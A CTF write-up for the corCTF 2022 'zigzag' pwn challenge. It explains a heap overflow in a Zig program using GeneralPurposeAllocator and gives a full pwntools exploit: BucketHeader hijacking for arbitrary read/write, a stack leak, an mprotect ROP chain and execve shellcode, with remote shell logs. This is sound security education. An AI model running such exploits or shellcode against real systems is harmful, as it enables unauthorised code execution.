[corCTF 2022 - pwn] zigzag
Introduction
zigzag
is a zig heap challenge I did during the corCTF 2022 event. It was pretty exotic given we have to pwn a heap like challenge written in zig. It is not using the C allocator but instead it uses the GeneralPurposeAllocator, which makes the challenge even more interesting. Find the tasks here.
TL; DR
- Understanding zig
GeneralPurposeAllocator
internals - Hiijack the
BucketHeader
of a given bucket to get a write what were / read what where primitive. - Leak stack + ROP on the fileRead function (mprotect + shellcode)
- PROFIT
Source code analysis
The source code is procided:
// zig build-exe main.zig -O ReleaseSmall
// built with zig version: 0.10.0-dev.2959+6f55b294f
const std = @import("std");
const fmt = std.fmt;
const stdout = std.io.getStdOut().writer();
const stdin = std.io.getStdIn();
const MAX_SIZE: usize = 0x500;
const ERR: usize = 0xbaad0000;
const NULL: usize = 0xdead0000;
var chunklist: [20][]u8 = undefined;
var gpa = std.heap.GeneralPurposeAllocator(.{}){};
const allocator = gpa.allocator();
pub fn menu() !void {
try stdout.print("[1] Add\n", .{});
try stdout.print("[2] Delete\n", .{});
try stdout.print("[3] Show\n", .{});
try stdout.print("[4] Edit\n", .{});
try stdout.print("[5] Exit\n", .{});
try stdout.print("> ", .{});
}
pub fn readNum() !usize {
var buf: [64]u8 = undefined;
var stripped: []const u8 = undefined;
var amnt: usize = undefined;
var num: usize = undefined;
amnt = try stdin.read(&buf);
stripped = std.mem.trimRight(u8, buf[0..amnt], "\n");
num = fmt.parseUnsigned(usize, stripped, 10) catch {
return ERR;
};
return num;
}
pub fn add() !void {
var idx: usize = undefined;
var size: usize = undefined;
try stdout.print("Index: ", .{});
idx = try readNum();
if (idx == ERR or idx >= chunklist.len or @ptrToInt(chunklist[idx].ptr) != NULL) {
try stdout.print("Invalid index!\n", .{});
return;
}
try stdout.print("Size: ", .{});
size = try readNum();
if (size == ERR or size >= MAX_SIZE) {
try stdout.print("Invalid size!\n", .{});
return;
}
chunklist[idx] = try allocator.alloc(u8, size);
try stdout.print("Data: ", .{});
_ = try stdin.read(chunklist[idx]);
}
pub fn delete() !void {
var idx: usize = undefined;
try stdout.print("Index: ", .{});
idx = try readNum();
if (idx == ERR or idx >= chunklist.len or @ptrToInt(chunklist[idx].ptr) == NULL) {
try stdout.print("Invalid index!\n", .{});
return;
}
_ = allocator.free(chunklist[idx]);
chunklist[idx].ptr = @intToPtr([*]u8, NULL);
chunklist[idx].len = 0;
}
pub fn show() !void {
var idx: usize = undefined;
try stdout.print("Index: ", .{});
idx = try readNum();
if (idx == ERR or idx >= chunklist.len or @ptrToInt(chunklist[idx].ptr) == NULL) {
try stdout.print("Invalid index!\n", .{});
return;
}
try stdout.print("{s}\n", .{chunklist[idx]});
}
pub fn edit() !void {
var idx: usize = undefined;
var size: usize = undefined;
try stdout.print("Index: ", .{});
idx = try readNum();
if (idx == ERR or idx >= chunklist.len or @ptrToInt(chunklist[idx].ptr) == NULL) {
try stdout.print("Invalid index!\n", .{});
return;
}
try stdout.print("Size: ", .{});
size = try readNum();
if (size > chunklist[idx].len and size == ERR) {
try stdout.print("Invalid size!\n", .{});
return;
}
chunklist[idx].len = size;
try stdout.print("Data: ", .{});
_ = try stdin.read(chunklist[idx]);
}
pub fn main() !void {
var choice: usize = undefined;
for (chunklist) |_, i| {
chunklist[i].ptr = @intToPtr([*]u8, NULL);
chunklist[i].len = 0;
}
while (true) {
try menu();
choice = try readNum();
if (choice == ERR) continue;
if (choice == 1) try add();
if (choice == 2) try delete();
if (choice == 3) try show();
if (choice == 4) try edit();
if (choice == 5) break;
}
}
The source code is quite readable, the vulnerability is the overflow within the edit
function. The check onto the provided size isn’t efficient, size > chunklist[idx].len and size == ERR
, if size > chunklist[idx].len
and if size != ERR
the condition is false. Which means we can edit the chunk by writing an arbitrary amount of data in it.
GeneralPurposeAllocator abstract
The zig source is quite readable so let’s take a look at the internals of the GeneralPurposeAllocator allocator. The GeneralPurposeAllocator is implemented here. The header of the source code file gives the basic design of the allocator:
//! ## Basic Design:
//!
//! Small allocations are divided into buckets:
//!
//! ```
//! index obj_size
//! 0 1
//! 1 2
//! 2 4
//! 3 8
//! 4 16
//! 5 32
//! 6 64
//! 7 128
//! 8 256
//! 9 512
//! 10 1024
//! 11 2048
//! ```
//!
//! The main allocator state has an array of all the "current" buckets for each
//! size class. Each slot in the array can be null, meaning the bucket for that
//! size class is not allocated. When the first object is allocated for a given
//! size class, it allocates 1 page of memory from the OS. This page is
//! divided into "slots" - one per allocated object. Along with the page of memory
//! for object slots, as many pages as necessary are allocated to store the
//! BucketHeader, followed by "used bits", and two stack traces for each slot
//! (allocation trace and free trace).
//!
//! The "used bits" are 1 bit per slot representing whether the slot is used.
//! Allocations use the data to iterate to find a free slot. Frees assert that the
//! corresponding bit is 1 and set it to 0.
//!
//! Buckets have prev and next pointers. When there is only one bucket for a given
//! size class, both prev and next point to itself. When all slots of a bucket are
//! used, a new bucket is allocated, and enters the doubly linked list. The main
//! allocator state tracks the "current" bucket for each size class. Leak detection
//! currently only checks the current bucket.
//!
//! Resizing detects if the size class is unchanged or smaller, in which case the same
//! pointer is returned unmodified. If a larger size class is required,
//! `error.OutOfMemory` is returned.
//!
//! Large objects are allocated directly using the backing allocator and their metadata is stored
//! in a `std.HashMap` using the backing allocator.
Let’s take a look at alloc
function:
fn alloc(self: *Self, len: usize, ptr_align: u29, len_align: u29, ret_addr: usize) Error![]u8 {
self.mutex.lock();
defer self.mutex.unlock();
if (!self.isAllocationAllowed(len)) {
return error.OutOfMemory;
}
const new_aligned_size = math.max(len, ptr_align);
if (new_aligned_size > largest_bucket_object_size) {
try self.large_allocations.ensureUnusedCapacity(self.backing_allocator, 1);
const slice = try self.backing_allocator.rawAlloc(len, ptr_align, len_align, ret_addr);
const gop = self.large_allocations.getOrPutAssumeCapacity(@ptrToInt(slice.ptr));
if (config.retain_metadata and !config.never_unmap) {
// Backing allocator may be reusing memory that we're retaining metadata for
assert(!gop.found_existing or gop.value_ptr.freed);
} else {
assert(!gop.found_existing); // This would mean the kernel double-mapped pages.
}
gop.value_ptr.bytes = slice;
if (config.enable_memory_limit)
gop.value_ptr.requested_size = len;
gop.value_ptr.captureStackTrace(ret_addr, .alloc);
if (config.retain_metadata) {
gop.value_ptr.freed = false;
if (config.never_unmap) {
gop.value_ptr.ptr_align = ptr_align;
}
}
if (config.verbose_log) {
log.info("large alloc {d} bytes at {*}", .{ slice.len, slice.ptr });
}
return slice;
}
const new_size_class = math.ceilPowerOfTwoAssert(usize, new_aligned_size);
const ptr = try self.allocSlot(new_size_class, ret_addr);
if (config.verbose_log) {
log.info("small alloc {d} bytes at {*}", .{ len, ptr });
}
return ptr[0..len];
}
First in alloc
, if the aligned size is not larger than the largest bucket capacity (2**11) it will call allocSlot
.
fn allocSlot(self: *Self, size_class: usize, trace_addr: usize) Error![*]u8 {
const bucket_index = math.log2(size_class);
const first_bucket = self.buckets[bucket_index] orelse try self.createBucket(
size_class,
bucket_index,
);
var bucket = first_bucket;
const slot_count = @divExact(page_size, size_class);
while (bucket.alloc_cursor == slot_count) {
const prev_bucket = bucket;
bucket = prev_bucket.next;
if (bucket == first_bucket) {
// make a new one
bucket = try self.createBucket(size_class, bucket_index);
bucket.prev = prev_bucket;
bucket.next = prev_bucket.next;
prev_bucket.next = bucket;
bucket.next.prev = bucket;
}
}
// change the allocator's current bucket to be this one
self.buckets[bucket_index] = bucket;
const slot_index = bucket.alloc_cursor;
bucket.alloc_cursor += 1;
var used_bits_byte = bucket.usedBits(slot_index / 8);
const used_bit_index: u3 = @intCast(u3, slot_index % 8); // TODO cast should be unnecessary
used_bits_byte.* |= (@as(u8, 1) << used_bit_index);
bucket.used_count += 1;
bucket.captureStackTrace(trace_addr, size_class, slot_index, .alloc);
return bucket.page + slot_index * size_class;
}
allocSlot
will check if the current bucket is able to allocate one more object, else it will iterate through the doubly linked list to look for a not full bucket.
And if it does nto find one, it creates a new bucket. When the bucket is allocated, it returns the available objet at bucket.page + slot_index * size_class
.
As you can see, the BucketHeader
is structured like below in the createBucket
function:
fn createBucket(self: *Self, size_class: usize, bucket_index: usize) Error!*BucketHeader {
const page = try self.backing_allocator.allocAdvanced(u8, page_size, page_size, .exact);
errdefer self.backing_allocator.free(page);
const bucket_size = bucketSize(size_class);
const bucket_bytes = try self.backing_allocator.allocAdvanced(u8, @alignOf(BucketHeader), bucket_size, .exact);
const ptr = @ptrCast(*BucketHeader, bucket_bytes.ptr);
ptr.* = BucketHeader{
.prev = ptr,
.next = ptr,
.page = page.ptr,
.alloc_cursor = 0,
.used_count = 0,
};
self.buckets[bucket_index] = ptr;
// Set the used bits to all zeroes
@memset(@as(*[1]u8, ptr.usedBits(0)), 0, usedBitsCount(size_class));
return ptr;
}
It allocates a page to store objects in, then it allocates the BucketHeader
itself. Note that the page allocator will make allocations adjacent from each other. According to my several experiments the allocations grow – from an initial given mapping – to lower or higher addresses. I advice you to try different order of allocations in gdb to figure out this.
Let’s quickly decribe each field of the BucketHeader
:
.prev
and.next
keep track of the doubly linked list that links buckets of same size..page
contains the base address of the page that contains the objects that belong to the bucket.alloc_cursor
contains the number of allocated objects.used_count
contains the number of currently used objects.
Getting read / write what were primitive
Well, the goal is to an arbitrary read / write by hiijacking the .page
and .alloc_cursor
fields of the BucketHeader
, this way if we hiijack pointers from a currently used bucket for a given size we can get a chunk toward any location.
What we can do to get a chunk close to a BucketHeader
structure would be:
- Allocate large (
0x500-1
) chunk,0x800
bucket. - Allocate 4 other chunks of size
1000
, which end up in the0x400
bucket.
Thus, first one page has been allocated to satisfy request one, then another page right after the other has been allocated to store the BucketHeader
for this bucket.
Then, to satisfy the four next allocations, the page that stores the objects has been allocated right after the one which stores the BucketHeader
of the 0x800
-bucket, and finally a page is allocated to store the BucketHeader
of the 0x400
bucket.
If you do not understand clearly, I advice you to debug my exploit in gdb
by looking at the chunklist
.
With this process the last allocated 0x400
-sized chunk gets allocated 0x400
bytes before the BucketHeader
of the bucket that handles 0x400
-sized chunks.
Thus to get a read / write what were we can simply trigger the heap overflow with the edit
function to null out .alloc_cursor
and .used_count
and replace .page
by the target location.
This way the next allocation that will request 0x400
bytes, which will trigger the hiijacked bucket and return the target location giving us the primitive.
Which gives:
alloc(0, 0x500-1, b"A")
for i in range(1, 5):
alloc(i, 1000, b"vv")
edit(4, 0x400 + 5*8, b"X"*0x400 \ # padding
+ pwn.p64(0x208000)*3 \ # next / prev + .page point toward the target => 0x208000
+ pwn.p64(0x0) \ # .alloc_cursor & .used_count
+ pwn.p64(0)) # used bits
# next alloc(1000) will trigger the write what were
Leak stack
To leak the stack I leaked the argv
variable that contains a pointer toward arguments given to the program, stored on the stack. That’s a reliable leak given it’s a known and fixed location, which can base used as a base compared with function’s stackframes.
alloc(5, 1000, b"A") # get chunk into target location (0x208000)
show(5)
io.recv(0x100) # argv is located at 0x208000 + 0x100
stack = pwn.u64(io.recv(8))
pwn.log.info(f"stack: {hex(stack)}")
ROP
Now we’re able to overwrite whatever function’s stackframe, we have to find one that returns from context of std.fs.file.File.read
that reads the user input to the chunk. But unlucky functions like add
, edit
are inlined in the main
function. Moreover we cannot overwrite the return address of the main
function given that the exit handler call directly exit. Which means we have to corrput the stackframe of the std.fs.file.File.read
function called in the edit
function.
But the issue is that between the call to SYS_read
within std.fs.file.File.read
and the end of the function, variables that belong to the calling function’s stackframe are edited, corrupting the ROPchain. So what I did is using this gadget to reach a part of the stack that will not be corrupted:
0x0000000000203715 : add rsp, 0x68 ; pop rbx ; pop r14 ; ret
With the use of this gadget I’m able to pop a few QWORD from the stack to reach another area of the stack where I write my ROPchain.
The goal for the ROPchain is to mptotect
a shellcode and then jump on it. The issue is that I didn’t find a gadget to control the value of the rdx
register but when it returns from std.fs.file.File.read
it contains the value of size given to edit
. So to call mprotect(rdi=0x208000, rsi=0x1000, rdx=0x7)
we have to call edit
with a size of 7
to write on the std.fs.file.File.read
saved RIP the value of the magic gadget seen previously.
Here is the ROPchain:
edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(0x208000)*3 + pwn.p64(0x000) + pwn.p64(0))
# with the use of the write what were we write the shellcode at 0x208000
shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
# execve("/bin/sh", NULL, NULL)
alloc(14, 1000, shellcode)
"""
0x0000000000201fcf : pop rax ; syscall
0x0000000000203147 : pop rdi ; ret
0x000000000020351b : pop rsi ; ret
0x00000000002035cf : xor edx, edx ; mov rsi, qword ptr [r9] ; xor eax, eax ; syscall
0x0000000000201e09 : ret
0x0000000000203715 : add rsp, 0x68 ; pop rbx ; pop r14 ; ret
"""
edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(stack-0x50)* 3 + pwn.p64(0) + pwn.p64(0))
# write ROPchain into the safe area on the stack
alloc(11, 0x400, pwn.p64(0x203147) \ # pop rdi ; ret
+ pwn.p64(0x208000) + \ # target area for the shellcode
pwn.p64(0x20351b) + \ # pop rsi ; ret
pwn.p64(0x1000) + \ # length
pwn.p64(0x201fcf) + \ # pop rax ; syscall
pwn.p64(0xa) + \ # SYS_mprotect
pwn.p64(0x208000)) # jump on the shellcode + PROFIT
edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(stack-0xd0)* 3 + pwn.p64(0) + pwn.p64(0))
alloc(12, 1000, pwn.p64(0x202d16)) # valid return address
edit(12, 0x7, pwn.p64(0x0000000000203715)) # magic gadget
io.interactive()
PROFIT
nasm@off:~/Documents/pwn/corCTF/zieg$ python3 remote.py REMOTE HOST=be.ax PORT=31278
[*] '/home/nasm/Documents/pwn/corCTF/zieg/zigzag'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x200000)
[+] Opening connection to be.ax on port 31278: Done
[*] stack: 0x7ffc2ca48ae8
[*] Loaded 37 cached gadgets for 'zigzag'
[*] Using sigreturn for 'SYS_execve'
[*] Switching to interactive mode
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ ls
flag.txt
zigzag
$ cat flag.txt
corctf{bl4Z1nGlY_f4sT!!}
Appendices
Final exploit:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# this exploit was generated via
# 1) pwntools
# 2) ctfmate
import os
import time
import pwn
# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF('zigzag')
# pwn.context.terminal = ['tmux', 'new-window']
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
host = pwn.args.HOST or '127.0.0.1'
port = int(pwn.args.PORT or 1337)
def local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if pwn.args.GDB:
return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return pwn.process([exe.path] + argv, *a, **kw)
def remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = pwn.connect(host, port)
if pwn.args.GDB:
pwn.gdb.attach(io, gdbscript=gdbscript)
return io
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if pwn.args.LOCAL:
return local(argv, *a, **kw)
else:
return remote(argv, *a, **kw)
gdbscript = '''
source ~/Downloads/pwndbg/gdbinit.py
'''.format(**locals())
io = None
io = start()
def alloc(idx, size, data):
io.sendlineafter(b"> ", b"1")
io.sendlineafter(b"Index: ", str(idx).encode())
io.sendlineafter(b"Size: ", str(size).encode())
io.sendlineafter(b"Data: ", data)
def delete(idx):
io.sendlineafter(b"> ", b"2")
io.sendlineafter(b"Index: ", str(idx).encode())
def show(idx):
io.sendlineafter(b"> ", b"3")
io.sendlineafter(b"Index: ", str(idx).encode())
def edit(idx, size, data):
io.sendlineafter(b"> ", b"4")
io.sendlineafter(b"Index: ", str(idx).encode())
io.sendlineafter(b"Size: ", str(size).encode())
io.sendlineafter(b"Data: ", data)
alloc(0, 0x500-1, b"A")
for i in range(1, 5):
alloc(i, 1000, b"vv")
edit(4, 0x400 + 5*8, b"X"*0x400 + pwn.p64(0x208000)*3 + pwn.p64(0x000) + pwn.p64(0))
alloc(5, 1000, b"A")
show(5)
io.recv(0x100)
stack = pwn.u64(io.recv(8))
pwn.log.info(f"stack: {hex(stack)}")
edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(0x208000)*3 + pwn.p64(0x000) + pwn.p64(0))
shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
alloc(14, 1000, shellcode)
"""
0x0000000000201fcf : pop rax ; syscall
0x0000000000203147 : pop rdi ; ret
0x000000000020351b : pop rsi ; ret
0x00000000002035cf : xor edx, edx ; mov rsi, qword ptr [r9] ; xor eax, eax ; syscall
0x0000000000201e09 : ret
0x0000000000203715 : add rsp, 0x68 ; pop rbx ; pop r14 ; ret
"""
rop = pwn.ROP(exe)
binsh = 0x208000+(48)
rop.execve(binsh, 0, 0)
edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(stack-0x50)* 3 + pwn.p64(0) + pwn.p64(0))
alloc(11, 0x400, pwn.p64(0x203147) + pwn.p64(0x208000) + pwn.p64(0x20351b) + pwn.p64(0x1000) + pwn.p64(0x201fcf) + pwn.p64(0xa) + pwn.p64(0x208000))
edit(4, 0x400 + 5*8, b"A"*0x400 + pwn.p64(stack-0xd0)* 3 + pwn.p64(0) + pwn.p64(0))
alloc(12, 1000,pwn.p64(0x202d16))
edit(12, 0x7, pwn.p64(0x0000000000203715))
io.interactive()
"""
nasm@off:~/Documents/pwn/corCTF/zieg$ python3 remote.py REMOTE HOST=be.ax PORT=31278
[*] '/home/nasm/Documents/pwn/corCTF/zieg/zigzag'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x200000)
[+] Opening connection to be.ax on port 31278: Done
[*] stack: 0x7ffe21d2cc68
[*] Loaded 37 cached gadgets for 'zigzag'
[*] Using sigreturn for 'SYS_execve'
[*] Switching to interactive mode
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ cat flag.txt
corctf{bl4Z1nGlY_f4sT!!}
"""